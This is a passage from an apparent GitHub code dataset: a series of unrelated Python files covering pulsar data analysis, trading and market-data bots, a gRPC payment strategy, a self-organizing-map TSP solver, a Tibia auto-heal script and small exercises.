[(pt[0]-(pad+ang_arrow_len)*od[0]+(tipwidth/2)*pd[0],\r\n                                         pt[1]-(pad+ang_arrow_len)*od[1]+(tipwidth/2)*pd[1]),\r\n                                        (pt[0]-(pad+ang_arrow_len)*od[0]-(tipwidth/2)*pd[0],\r\n                                         pt[1]-(pad+ang_arrow_len)*od[1]-(tipwidth/2)*pd[1]),\r\n                                        (pt[0]-(pad+ang_arrow_len+np.sqrt(3)*tipwidth/2)*od[0],\r\n                                         pt[1]-(pad+ang_arrow_len+np.sqrt(3)*tipwidth/2)*od[1])]\r\n\r\n        # Edit the pole polygon vertex\r\n        pole = self._pole_geom\r\n        l, r, t, b = -polewidth / 2, polewidth / 2, polelen - polewidth / 2, -polewidth / 2\r\n        pole.v = [(l, b), (l, t), (r, t), (r, b)]\r\n\r\n\r\n        cartx = x[0] * scale + screen_width / 2.0 # MIDDLE OF CART\r\n        self.carttrans.set_translation(cartx, carty)\r\n        self.poletrans.set_rotation(-x[2])\r\n\r\n        if self.steps_beyond_done is not None:\r\n            pole.set_color(.8, .2, .2)\r\n            self.cart.set_color(.3, 0.1, 0.1)\r\n\r\n        return self.viewer.render(return_rgb_array=mode == 'rgb_array')\r\n\r\n    def close(self):\r\n        if self.viewer:\r\n            self.viewer.close()\r\n            self.viewer = None\r\n","repo_name":"aVariengien/self-organized-control","sub_path":"code/SelfOrgControl/CustomCartPoleEnv.py","file_name":"CustomCartPoleEnv.py","file_ext":"py","file_size_in_byte":17837,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"68"} +{"seq_id":"6846312766","text":"import numpy as np\nimport psrchive as psr\nimport matplotlib.pyplot as plt\nimport os\n\ncwd = os.getcwd()\nos.chdir('/fred/oz005/users/akulkarn/J0437-4715/J0437-4715_meerkat_19May_22/Processed/Frequency_Appended_all_withK/Corrected_DM/4pul_Integrated/')\n\nar=psr.Archive_load(\"pulse_8984616844_Lband.paz.XP.it\")\nar.set_dispersion_measure(2.64161357856353) ## Dispersion measure obtained from timing analysis of 8 sec integrated data\nar.dedisperse()\n\nar.pscrunch() ## Doing analysis on Total intensity\npol=0\ndata=ar.get_data()\ndim=data.shape\n##################################################################################################################################################\n## The current data does not seem to be bandpass calibrated and hence the bandpass is not flattened.
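\n## We therefore estimate a per-channel baseline from the off-pulse window (bins 800:1020) and subtract it below.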
\nbaseline=np.ndarray([dim[0],dim[2]])\n ## Calculating baseline as a function of frequency from data######\nfor k in range(dim[2]):\n    for i in range(dim[0]):\n        baseline[i,k]=np.mean(data[i,0,k,800:1020])\n\n## Removing baseline from data\ndata_baseline_removed=np.ndarray([dim[0],dim[2],dim[3]])\nfor i in range(dim[0]):\n    for j in range(dim[2]):\n        data_baseline_removed[i,j,:]=np.add(np.subtract(data[i,0,j,:],baseline[i,j]),1)\n\n##################################################################################################################################################\n###### Defining the matrix of Energy components [Subint,Freq]\nEner_main_comp=np.ndarray([dim[0],dim[2]])\n\nfor i in range(dim[0]):\n    for j in range(dim[2]):\n        Ener_main_comp[i,j]=np.divide(np.sum(data[i,pol,j,300:420]-np.mean(data[i,pol,j,800:1020])),np.multiply(np.sqrt(120),np.std(data[i,pol,j,800:1020])))\n\n##########Calculating Pearson Correlation coefficient across frequency #############\nR_pear_Ener_main=np.ndarray([dim[2],dim[2]])\n\nR_pear_Ener_main=np.corrcoef(Ener_main_comp,rowvar=False)\n\n## Defining matrix of Energy components for noise [Subint,Freq]\nEner_main_comp_noise=np.ndarray([dim[0],dim[2]])\n\nfor i in range(dim[0]):\n    for j in range(dim[2]):\n        Ener_main_comp_noise[i,j]=np.divide(np.sum(data[i,pol,j,650:770]-np.mean(data[i,pol,j,800:1020])),np.multiply(np.sqrt(120),np.std(data[i,pol,j,800:1020])))\n####################################################################################################################################################3\n####### Plotting results############\nFig, Axs = plt.subplots(nrows=3,ncols=3)\n\nfor r in range(3):\n    for j in range(3):\n        Axs[r,j].scatter(Ener_main_comp[:,10],Ener_main_comp[:,6*r+j+3],label='10,'+str(6*r+j+3))\n        Axs[r,j].legend()\n\n\nFig1, Axs1 = plt.subplots(nrows=3,ncols=3)\n\nfor r in range(3):\n    for j in range(3):\n        Axs1[r,j].scatter(Ener_main_comp_noise[:,10],Ener_main_comp_noise[:,6*r+j+3],label='10,'+str(6*r+j+3))\n        Axs1[r,j].legend()\n\n\n#############################################################################################\n############################################################################################\n#\n#\n#          CALCULATING MODULATION INDEX\n#\n#\n#############################################################################################\n\nmodIndex=np.ndarray([dim[2],dim[3]])\nfor i in range(dim[2]):\n    for j in range(dim[3]):\n        modIndex[i,j]=np.divide(np.sqrt(np.var(data_baseline_removed[:,i,j])-np.mean(np.var(data_baseline_removed[:,i,800:1020],axis=1))),np.mean(data_baseline_removed[:,i,j]))\n\n\nplt.show()\n\nos.chdir(cwd)","repo_name":"Atharva1994/Project_Jitter","sub_path":"old_codes/mk/Pulse_energy_corr.py","file_name":"Pulse_energy_corr.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"15522956185","text":"def solution():\n    def integers():\n        num = 1\n        while True:\n            yield num\n            num += 1\n\n    def halves():\n        for i in integers():\n            yield i / 2\n\n    def take(n, seq):\n        new_list = []\n        times = 0\n        for v in seq:\n            new_list.append(v)\n            if times == n - 1:\n                break\n            times += 1\n\n        return new_list\n\n    return take, halves, integers\n\n\ntake = solution()[0]\nhalves = solution()[1]\nprint(take(5, 
halves()))\n","repo_name":"Pavel-Petkov03/SoftuniHomeworks","sub_path":"Programming_OOP_with_Python/Exercises/iterator_and_generator_exercise/take_halves.py","file_name":"take_halves.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"19085562594","text":"import json\n\n\nclass Pnl():\n\n    def __init__(self, client):\n        \"\"\"\n        client is used to issue orders\n        \"\"\"\n        self.client = client\n        # running statistics for the AAPL close price and the last price seen\n        self.count_AAPL = 0\n        self.total_AAPL = 0\n        self.previous_price = 0\n\n    def process_candle(self, candle_msg:str):\n        \"\"\"This function is called when a new candle_msg is received.\n        Candle message is a string of the form:\n        {'symbol_key' : {'c': [174.3], 'h': [174.3], 'l': [174.19], 'o': [174.19], 's': 'ok', 't': [1643670000], 'v': [1888]}\n\n        Note that these are lists, so you can have multiple candles in one message.\n        \"\"\"\n        if self.client.money > 300:\n            self.client.buy('AAPL', 1)\n\n        candle_dict = json.loads(candle_msg)\n        for k, v in candle_dict.items():\n            if 'AAPL' == k:\n                self.update_aapl_mean(v)\n                print(f\"Mean: {self.total_AAPL/self.count_AAPL}\")\n            self.sell_if_needed(k, v)\n            self.previous_price = v['c']\n\n    def update_aapl_mean(self, v):\n        self.count_AAPL += 1\n        self.total_AAPL += v['c']\n\n    def sell_if_needed(self, k, v):\n        if v['c'] < self.previous_price:\n            self.client.sell(k, 1)\n        elif self.client.money > v['c']:\n            self.client.buy(k, 1)\n\n\n# Example RSI lookup; requires a configured `finnhub_client`, which this module does not define:\n# print(finnhub_client.technical_indicator(\n#     symbol=\"AAPL\",\n#     resolution=\"D\",\n#     _from=1583098857,\n#     to=1584308457,\n#     indicator=\"rsi\",\n#     indicator_fields={\"timeperiod\": 3},\n#     )\n# )\n","repo_name":"Pradich95/Robot-trading-PNL","sub_path":"trading_bot.py","file_name":"trading_bot.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38159201152","text":"\"\"\" \"\"\"\n\nfrom numbers import Real\nfrom typing import ClassVar\n\nimport numpy as np\n\nfrom qcrew.helpers import logger\nfrom qcrew.helpers.parametrizer import Parametrized\nfrom qcrew.helpers.yamlizer import Yamlizable\n\nBASE_PULSE_AMP = 0.2 # in V\nCLOCK_CYCLE = 4 # in ns\n\n\nclass Pulse(Parametrized, Yamlizable):\n    \"\"\" \"\"\"\n\n    _parameters: ClassVar[set[str]] = {\"length\", \"ampx\"}\n\n    def __init__(\n        self,\n        *, # enforce keyword-only arguments\n        length: int = 400,\n        ampx: float = 1.0,\n        integration_weights=None,\n    ) -> None:\n        \"\"\" \"\"\"\n        self.length: int = length\n        self.ampx: float = ampx\n\n        self.is_readout_pulse: bool = False\n        self.integration_weights = None\n        if integration_weights is not None:\n            self.integration_weights = integration_weights\n            self.is_readout_pulse = True\n            self._update_integration_weights(\"length\")\n\n        self.has_mix_waveforms: bool = True # qcrew's default use case\n\n    def __repr__(self) -> str:\n        \"\"\" \"\"\"\n        return f\"{type(self).__name__}[{self.type_}]{self.parameters}\"\n\n    def __call__(self, **parameters: Real) -> None:\n        \"\"\" \"\"\"\n        for name, value in parameters.items():\n            is_attribute = hasattr(self, name)\n            if is_attribute and value is not None:\n                setattr(self, name, value)\n                if self.is_readout_pulse:\n                    self._update_integration_weights(name)\n            elif not is_attribute:\n                cls_name = type(self).__name__\n                logger.warning(f\"Parameter '{name}' must be an attribute of {cls_name}\")\n        logger.success(f\"Set {self}\")\n\n    def _update_integration_weights(self, key: str) -> None:\n        \"\"\" \"\"\"\n        do_update = key == \"length\" and self.integration_weights.is_pinned\n        if do_update:\n
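            # the division below converts the pulse length in ns to units of the 4 ns FPGA clock cycle\n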
            new_iw_len = int(self.length / CLOCK_CYCLE)\n            self.integration_weights.length = new_iw_len\n            logger.debug(f\"Set integration weights len = {new_iw_len}\")\n\n    @property # waveform amplitude samples getter\n    def samples(self) -> tuple[np.ndarray]:\n        \"\"\" \"\"\"\n        logger.error(\"Abstract method must be implemented by subclass(es)\")\n        raise NotImplementedError(\"Can't call `samples` on Pulse instance\")\n\n    @property # pulse type_ getter for building QM config\n    def type_(self) -> str:\n        \"\"\" \"\"\"\n        return \"measurement\" if self.is_readout_pulse else \"control\"\n","repo_name":"qcrew-lab/qcrew","sub_path":"qcrew/control/pulses/pulse.py","file_name":"pulse.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"19840672494","text":"#!/usr/bin/env python3\n# coding: utf-8\n#\n# author: https://github.com/vladiscripts\n#\nimport requests\nfrom urllib.parse import quote\nfrom lxml import etree\nimport re\nimport pywikibot\nimport vladi_commons\n\n\ndef normalization_pagename(t):\n\t\"\"\" First letter to upper case, ' ' > '_' \"\"\"\n\tt = t.strip()\n\treturn t[0:1].upper() + t[1:].replace(' ', '_')\n\n# wikipages_filename = r'..\\temp\\AWBfile.txt'\n# text = vladi_commons.file_readtext(wikipages_filename)\nexclude_namespaces = r'(Special|Служебная|Участник|User|У|Обсуждение[ _]участника|ОУ|Википедия|ВП|Обсуждение[ _]Википедии|Обсуждение):'\nclose_tpls = re.compile(r'\\{\\{([Оо]тпатрулировано|[Сс]делано|[Dd]one|[Оо]тклонено)\\s*(?:\\|.*?)?\\}\\}')\nsections_re = re.compile(r\"
[\\n\\s]*\\{\\{выступ\\s*\\|\\s*\\[?\\s*''+([^']+)\", re.DOTALL)\nlink_re = re.compile(r'\\s*(?)\\s*(\\[\\[(?!%s).*?\\]\\])' % exclude_namespaces)\nlink_title_re = re.compile(r'\\[\\[([^]|]+).*?\\]\\]')\nlink_just_re = re.compile(r'\\s*(\\[\\[(?!%s).*?\\]\\])' % exclude_namespaces)\ntag_li_re = re.compile(r'^[*#](.*)$', re.MULTILINE)\nheader_re = re.compile(r'^==+([^=]+)==+$', re.MULTILINE)\ntextend = re.compile(r'\\n*$')\n\nre_akut = re.compile(r'\\{\\{[Аа]кут3?\\}\\}')\nre_notw = re.compile(r'[^\\w -]')\n\npage_tsds_list = []\n\nsite = pywikibot.Site('ru', 'wikisource')\noffset_of_volumes = [17, 2, 2, 4]\nvolume = 4\nscanpageN = 5\nwhile scanpageN <= 800:\n\t# for workpage in workpages:\n\tworkpage = 'Страница:Толковый словарь. Том 4 (Даль 1909).djvu/' + str(scanpageN)\n\tpage = pywikibot.Page(site, workpage)\n\ttext = page.get()\n\n\tfirst_tsds = True\n\n\t# odd page number\n\t# if number % 2:\n\t# \tpb = pb + 1\n\t# return pb / 2 + offset[2]\n\n\tbookpageN = str((scanpageN - offset_of_volumes[volume - 1]) * 2 - 1) \\\n\t\t\t\t+ '-' + \\\n\t\t\t\tstr((scanpageN - offset_of_volumes[volume - 1]) * 2)\n\n\tsections = sections_re.findall(text)\n\tfor section in sections:\n\t\tword_DO = section[1]\n\t\tword_DO = re_akut.sub('', word_DO)\n\t\tword_DO = re_notw.sub('', word_DO)\n\n\t\tif first_tsds:\n\t\t\tmarker_showpageN = '\\t|3'\n\t\t\tfirst_tsds = None\n\t\telse:\n\t\t\tmarker_showpageN = ''\n\n\t\ttsds = '# {{tsds|%s\\t|%s\\t|%s%s}}' % (section[0], word_DO, str(bookpageN), marker_showpageN)\n\n\t\tpage_tsds_list.append(tsds)\n\n\tscanpageN += 1\n\n\ntext = '\\n'.join(page_tsds_list)\n\npass\n\nvladi_commons.file_savetext('tsds3-' + str(volume) + '.txt', text)\npass\n","repo_name":"vladiscripts/4wiki","sub_path":"tsd3-slovnik.py","file_name":"tsd3-slovnik.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"12841790087","text":"import importlib\nfrom urllib.parse import urlparse\n\nimport grpc\nimport web3\nfrom snet.sdk.payment_strategies.payment_staregy import PaymentStrategy\nfrom snet.snet_cli.utils.utils import RESOURCES_PATH, add_to_path\nfrom snet.sdk.root_certificate import root_certificate\n\nclass FreeCallPaymentStrategy(PaymentStrategy):\n\n    def is_free_call_available(self, service_client):\n        try:\n            org_id, service_id, group_id, daemon_endpoint = service_client.get_service_details()\n            email, token_for_free_call, token_expiry_date_block = service_client.get_free_call_config()\n\n            if not token_for_free_call:\n                return False\n\n            signature, current_block_number = self.generate_signature(service_client)\n            with add_to_path(str(RESOURCES_PATH.joinpath(\"proto\"))):\n                state_service_pb2 = importlib.import_module(\"state_service_pb2\")\n\n            with add_to_path(str(RESOURCES_PATH.joinpath(\"proto\"))):\n                state_service_pb2_grpc = importlib.import_module(\"state_service_pb2_grpc\")\n\n            request = state_service_pb2.FreeCallStateRequest()\n            request.user_id = email\n            request.token_for_free_call = token_for_free_call\n            request.token_expiry_date_block = token_expiry_date_block\n            request.signature = signature\n            request.current_block = current_block_number\n\n            endpoint_object = urlparse(daemon_endpoint)\n            if endpoint_object.port is not None:\n                channel_endpoint = endpoint_object.hostname + \":\" + str(endpoint_object.port)\n            else:\n                channel_endpoint = endpoint_object.hostname\n\n            if endpoint_object.scheme == \"http\":\n                channel = grpc.insecure_channel(channel_endpoint)\n            elif 
endpoint_object.scheme == \"https\":\n channel = grpc.secure_channel(channel_endpoint, grpc.ssl_channel_credentials(root_certificates=root_certificate))\n else:\n raise ValueError('Unsupported scheme in service metadata (\"{}\")'.format(endpoint_object.scheme))\n\n stub = state_service_pb2_grpc.FreeCallStateServiceStub(channel)\n response = stub.GetFreeCallsAvailable(request)\n if response.free_calls_available > 0:\n return True\n return False\n except Exception as e:\n return False\n\n def get_payment_metadata(self, service_client):\n email, token_for_free_call, token_expiry_date_block = service_client.get_free_call_config()\n signature, current_block_number = self.generate_signature(service_client)\n metadata = [(\"snet-free-call-auth-token-bin\", token_for_free_call),\n (\"snet-free-call-token-expiry-block\", str(token_expiry_date_block)),\n (\"snet-payment-type\", \"free-call\"),\n (\"snet-free-call-user-id\", email),\n (\"snet-current-block-number\", str(current_block_number)),\n (\"snet-payment-channel-signature-bin\", signature)]\n\n return metadata\n\n def select_channel(self, service_client):\n pass\n\n def generate_signature(self, service_client):\n org_id, service_id, group_id, daemon_endpoint = service_client.get_service_details()\n email, token_for_free_call, token_expiry_date_block = service_client.get_free_call_config()\n\n if token_expiry_date_block == 0 or len(email) == 0 or len(token_for_free_call) == 0:\n raise Exception(\n \"You are using default 'FreeCallPaymentStrategy' to use this strategy you need to pass \"\n \"'free_call_auth_token-bin','email','free-call-token-expiry-block' in config\")\n\n current_block_number = service_client.get_current_block_number()\n\n message = web3.Web3.soliditySha3(\n [\"string\", \"string\", \"string\", \"string\", \"string\", \"uint256\", \"bytes32\"],\n [\"__prefix_free_trial\", email, org_id, service_id, group_id, current_block_number,\n token_for_free_call]\n )\n return service_client.generate_signature(message), current_block_number\n","repo_name":"singnet/snet-cli","sub_path":"packages/sdk/snet/sdk/payment_strategies/freecall_payment_strategy.py","file_name":"freecall_payment_strategy.py","file_ext":"py","file_size_in_byte":4122,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"68"} +{"seq_id":"70902082456","text":"import os\r\nfrom nsf_query import get_awards_csv\r\nfrom datetime import datetime\r\n\r\ndefault = 1976\r\ncurrent = datetime.now().year # grep all awards till current year\r\n\r\n# Program list to be downloaded.\r\nprograms = {\r\n \"Applied Mathematics\" : default,\r\n \"Computational Mathematics\" : 1984,\r\n \"Analysis\" : 1991,\r\n \"Probability\" : default,\r\n \"Statistics\" : default,\r\n \"Algebra and Number Theory\" : default,\r\n \"Topology\" : default,\r\n \"Mathematical Biology\" : 2001,\r\n \"Geometric Analysis\" : default,\r\n \"Combinatorics\" : 2006,\r\n \"Foundations\" : default\r\n}\r\n\r\n\r\nfor program, start_year in programs.items():\r\n for year in range(start_year, current + 1):\r\n print( \"downloading \" + program + \" \" + str(year) )\r\n\r\n cur_dir = os.path.dirname(__file__)\r\n prog_dir = program.replace(\" \", \"-\")\r\n \r\n target_file = os.path.join(os.path.join(cur_dir, prog_dir), \"Awards-\" + program.replace(\" \", \"-\") +\"-\" + str(year) + \".csv\")\r\n\r\n if os.path.exists(target_file) and year < current:\r\n print( \"file exists for \" + program + \" \" + str(year) +\"\\n\" )\r\n else:\r\n out = get_awards_csv(program, year)\r\n 
            if out == 0:\r\n                print( \"update needed, the download is completed for \" + program + \" \" + str(year) +\"\\n\" )\r\n            elif out == 1:\r\n                print( \"update is not needed, the download is completed for \" + program + \" \" + str(year) +\"\\n\")\r\n            elif out == 2:\r\n                print(\" creating new file, the download is completed for \" + program + \" \" + str(year) +\"\\n\")\r\n            else:\r\n                print(\"downloading issue, awards not downloaded.\")\r\n\r\n\r\n# clean the directory\r\nif os.path.exists(\"Awards.csv\"):\r\n    os.remove(\"Awards.csv\")","repo_name":"lowrank/NSF-DMS-awards","sub_path":"nsf_awards.py","file_name":"nsf_awards.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"4470660658","text":"import pyautogui as pg\nimport time\n\nREGION_PARTY = (1570,135,171,147)\nREGION_LIFE = (1599,200)\nREGION_GRANSIO= (1447,140,144,139)\n\n\ndef Sio ():\n\n    while True:\n        if pg.pixelMatchesColor(1597, 171, (96, 191, 96)): # green color\n            pg.press('F7')\n            time.sleep(0.05)\n            pg.press('F7')\n            print('Using Sio... health in the green')\n            pg.sleep(1)\n\n        if pg.pixelMatchesColor(1597, 171, (191, 191, 0)): # yellow color\n            if pg.pixelMatchesColor(1652,171,(75,75,75)) and pg.locateOnScreen('imgs/region_gransio.png', confidence=0.9, region=REGION_GRANSIO):\n                pg.press('F8')\n                time.sleep(0.05)\n                pg.press('F8')\n                print('Using GRANSIO... health in the yellow')\n                pg.sleep(1)\n            else:\n                pg.press('F7')\n                time.sleep(0.05)\n                pg.press('F7')\n                print('Using Sio... health in the yellow')\n                pg.sleep(1)\n\n        if pg.pixelMatchesColor(1597,171,(191,48,48)) or pg.pixelMatchesColor(1597,171,(95,0,0)): # red or black color\n            if pg.locateOnScreen('imgs/region_gransio.png', confidence=0.9, region= REGION_GRANSIO):\n                pg.press('F8')\n                time.sleep(0.05)\n                pg.press('F8')\n                print('Using GRANSIO... health in the red or black ')\n                pg.sleep(1)\n            else:\n                pg.press('F7')\n                time.sleep(0.05)\n                pg.press('F7')\n                pg.sleep(1)\n                print('Using Sio... 
health in the red or black ')\n        \nprint('Starting...')\n#pg.displayMousePosition()\nSio()","repo_name":"CaioMascarenhas/BOT_TIBIA","sub_path":"sio.py","file_name":"sio.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"20176771796","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\nfrom __future__ import division\n\nfrom .t_bithumb import T_Bithumb\n\n\nclass T_Bithumb_BCH(T_Bithumb):\n    \"\"\"\n    bch:\n    ./venv/bin/python -m quant.cli -mBithumb_BCH_KRW,Bitfinex_BCH_BTC,Bithumb_BTC_KRW -o=T_Bithumb_BCH -f=bithumb_bch -v\n\n    Current limits:\n    bithumb: bch_krw=0.01\n    bitfinex: bch_btc: 0.02\n    bithumb: btc_krw=0.001\n\n    \"\"\"\n\n    def __init__(self):\n        base_pair = \"Bithumb_BCH_KRW\"\n        pair_1 = \"Bitfinex_BCH_BTC\"\n        pair_2 = \"Bithumb_BTC_KRW\"\n\n        kwargs = {\n            'monitor_only': False,\n            'precision': 2,\n            'fee_base': 0.0015,\n            'fee_pair1': 0.002,\n            'fee_pair2': 0.0015,\n            'min_stock_base': 0.01,\n            'min_stock_pair1': 0.02,\n            'min_stock_pair2': 0.001,\n            'max_trade_amount': 1,\n            'min_trade_amount': 0.02\n        }\n        super(T_Bithumb_BCH, self).__init__(base_pair, pair_1, pair_2, **kwargs)\n","repo_name":"doubleDragon/QuantBot","sub_path":"quant/observers/t_bithumb_bch.py","file_name":"t_bithumb_bch.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"68"} +{"seq_id":"32796861072","text":"from pycaishen.pycaishenstorage import PycaishenStorage\nfrom pycaishen.pycaishendata import PycaishenData\n\nfrom pycaishen.user_programs.user_programs_settings import Configurer\n\nimport datetime\n\n\ndef chunks(list, n):\n    \"\"\"Yield successive n-sized chunks from the given list.\"\"\"\n\n    if n > 1:\n        for i in range(0, len(list), n):\n            yield list[i:i + n]\n    elif n == 1:\n        for i in range(0, len(list)):\n            yield list[i:i + 1]\n\n\nclass BloombergIntraday(object):\n\n    def get_bloomberg_data(self, bloomberg_symbols_tickers, start_date =\"01 01 2000\", finish_date = None, adjusted = True ):\n\n        if finish_date == None:\n            finish_date = datetime.date.today() - datetime.timedelta(days=1)\n\n        data = PycaishenData()\n        datasource = \"bloomberg\"\n\n        if adjusted == False:\n            options_type = ['parameter']\n            options_fields = [\"UseDPDF\"]\n            options_values = [\"N\"]\n\n            data.set_datasource_options(datasource, options_type=options_type, options_fields=options_fields,\n                                        options_values=options_values)\n\n        data.set_request(datasource_name=datasource, data_source_fields=None,\n                         category=None, data_source_tickers=bloomberg_symbols_tickers,\n                         start_date=start_date, finish_date=finish_date, freq=\"minute\", timeseries_type=True,\n                         )\n        print((\"* getting data for %d symbols .....\" % (len(bloomberg_symbols_tickers))))\n        return data.fetch_request()\n\n\n\n    def store_bloomberg_data(self, list_dataframes,append= False, library = Configurer.LIB_BLOOMBERG_MINUTE_ADJUSTED):\n\n        print(\"* Storing data in the database\")\n        storage = PycaishenStorage(\"arctic\")\n\n        i = 0\n        for dataframe in list_dataframes:\n            symbol = self._get_symbol_from_dataframe(dataframe)\n            storage.write(symbol,dataframe,library,append)\n            # print \"%s EOD data stored successfully \" % (symbol)\n            i = i + 1\n        print((\"=> %d / %d EOD data stored successfully \" % (i,len(list_dataframes))))\n\n\n    def _get_symbol_from_dataframe(self,dataframe):\n        symbol = dataframe.columns[0].split('.')[0]\n        return symbol\n\n\nif __name__ == '__main__':\n\n    from pycaishen.user_programs.Bloomberg.Bloomberg_all_symbols import 
bloomberg_all_symbol\n\n    symbols = bloomberg_all_symbol()\n\n    from pycaishen.user_programs.Bloomberg.Bloomberg_currencies import build_currencies_need\n    # symbols = build_currencies_need()\n\n    # symbols=[\"ADH MC Equity\",\"BCE MC Equity\"]\n    end_date = \"30 01 2017\"\n    Intraday = BloombergIntraday()\n    n = 500\n    for symbols in chunks(symbols,n) :\n        print(\"working on : \")\n        print(symbols)\n        data = Intraday.get_bloomberg_data(bloomberg_symbols_tickers=symbols,finish_date=end_date)\n        # data = EOD.get_bloomberg_EOD(bloomberg_symbols_tickers=symbols)\n        Intraday.store_bloomberg_data(data)\n\n    # storage = PycaishenStorage(\"arctic\")\n    # lib = Configurer.LIB_BLOOMBERG_MINUTE_ADJUSTED\n    # symbols = storage.list_symbols(lib)\n    # for symbol in symbols:\n    #     print storage.read(symbol,lib)\n","repo_name":"spyamine/pycaishen3","sub_path":"pycaishen/user_programs/Bloomberg/Bloomberg_minute.py","file_name":"Bloomberg_minute.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"15244621830","text":"# Author : Ondřej Maceška \n# Date : 12.7.2022\n# Task : https://www.algoexpert.io/questions/min-height-bst\n\n\n# O(n) time, O(n) space where n is the length of the array\ndef min_height_bst(array, previous_node = None):\n    \"\"\" Constructs a Binary Search Tree with minimum depth from the given array\n    (Recursive)\n    \n    Args:\n        array (int[]) : a given array \n        previous_node (BST) : the parent BST node for the current subarray \n\n    Returns:\n        BST : the root of the tree\n    \"\"\"\n    middle_index = len(array) // 2\n    middle_value = array[middle_index]\n    root = None\n    if(not previous_node):\n        previous_node = BST(middle_value)\n        root = previous_node\n    else:\n        previous_node = previous_node.insert(middle_value)\n    \n    left_array = array[:middle_index]\n    if(left_array):\n        min_height_bst(left_array, previous_node)\n\n    right_array = array[middle_index + 1:]\n    if(right_array):\n        min_height_bst(right_array, previous_node)\n\n    return root\n    \nclass BST:\n    def __init__(self, value):\n        self.value = value\n        self.left = None\n        self.right = None\n\n    def insert(self, value):\n        if value < self.value:\n            if self.left is None:\n                self.left = BST(value)\n                return self.left\n            else:\n                self.left.insert(value)\n        else:\n            if self.right is None:\n                self.right = BST(value)\n                return self.right\n            else:\n                self.right.insert(value)\n","repo_name":"Jasasul2/Algoexpert","sub_path":"Medium/minHeightBST.py","file_name":"minHeightBST.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"32303517757","text":"from sys import argv\n\nimport numpy as np, os\n\nfrom benchmarks.tsp.utils import read_dataset, normalize_2d\nfrom som.neuron import get_neighborhood, get_route\nfrom som.distance import select_closest, euclidean_distance, route_distance\nfrom benchmarks.tsp.plot import plot_network, plot_route\n\ndef main():\n\n\n    problem = read_dataset(\"uy734\")\n\n    route = som(problem, 200000)\n\n    problem = problem[\"node_coords\"][route]\n\n    distance = route_distance(problem)\n\n    print('Route found of length {}'.format(distance))\n\n\ndef som(problem, iterations, learning_rate=0.8, rnd=np.random):\n    \"\"\"Solve the TSP using a Self-Organizing Map.\"\"\"\n\n    # The population size is 8 times the number of cities\n    n = problem[\"num_nodes\"] * 8\n    cities = normalize_2d(problem[\"node_coords\"])\n\n    # Generate an adequate network of neurons:\n    network = rnd.rand(n, 2)*2-1\n    network[:, 1] = 
np.sqrt(1-(network[:, 0])**2) * (-1)**np.random.randint(2, size=network.shape[0])\n    network = network/2+0.5\n    # A = np.random.randint(2, size=network.shape[0])\n    # A = (-1)**np.random.randint(2, size=network.shape[0])\n    # A = network[:,0]**2 + network[:,1]**2\n    print('Network of {} neurons created. Starting the iterations:'.format(n))\n\n    plot_network(cities, network, name='diagrams/{}.png'.format(\"0000o\"))\n\n    for i in range(iterations):\n        if not i % 100:\n            print('\\t> Iteration {}/{}'.format(i, iterations), end=\"\\r\")\n        # Choose a random city\n        city = cities[rnd.randint(cities.shape[0]), :]\n        winner_idx = select_closest(network, city) # winner_idx in the network\n        # Generate a filter that applies changes to the winner's gaussian\n        gaussian = get_neighborhood(winner_idx, n//10, network.shape[0])\n        # Update the network's weights (closer to the city)\n        network += gaussian[:,np.newaxis] * learning_rate * (city - network)\n        # Decay the variables\n        learning_rate = learning_rate * 0.99997\n        n = n * 0.9997\n\n        # Check for plotting interval\n        if not i % 100:\n            plot_network(cities, network, name='diagrams/{:05d}.png'.format(i))\n\n        # Check if any parameter has completely decayed.\n        if n < 1:\n            print('Radius has completely decayed, finishing execution',\n            'at {} iterations'.format(i))\n            break\n        if learning_rate < 0.001:\n            print('Learning rate has completely decayed, finishing execution',\n            'at {} iterations'.format(i))\n            break\n    else:\n        print('Completed {} iterations.'.format(iterations))\n\n    plot_network(cities, network, name='diagrams/final.png')\n\n    route = get_route(cities, network)\n    plot_route(cities, route, 'diagrams/route.png')\n    return route\n\nif __name__ == '__main__':\n    main()\n","repo_name":"xiaolongzheng/-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"10186041787","text":"from flask import Flask, render_template, request, redirect, session\napp = Flask(__name__)\napp.secret_key = \"SSSHHHH secret key\"\n@app.route('/')\ndef app_home():\n\tsession['count'] = 0\n\tsession['page_visited'] = 0\n\treturn redirect('/count')\n@app.route('/count')\ndef count():\n\tsession['count'] += 1\n\tsession['page_visited'] += 1\n\tprint(session['count'])\n\treturn render_template('index.html')\n@app.route('/add2')\ndef add_2():\n\tsession['count'] += 1\n\tsession['page_visited'] = session['page_visited']\n\treturn redirect('/count')\n@app.route('/count_increment', methods=['POST'])\ndef countIncrement():\n\tc = request.form['count']\n\tprint(c*40)\n\tprint(session['count'])\n\tsession['page_visited'] = session['page_visited']\n\tsession['count'] = session['count'] + int(c) - 1\n\treturn 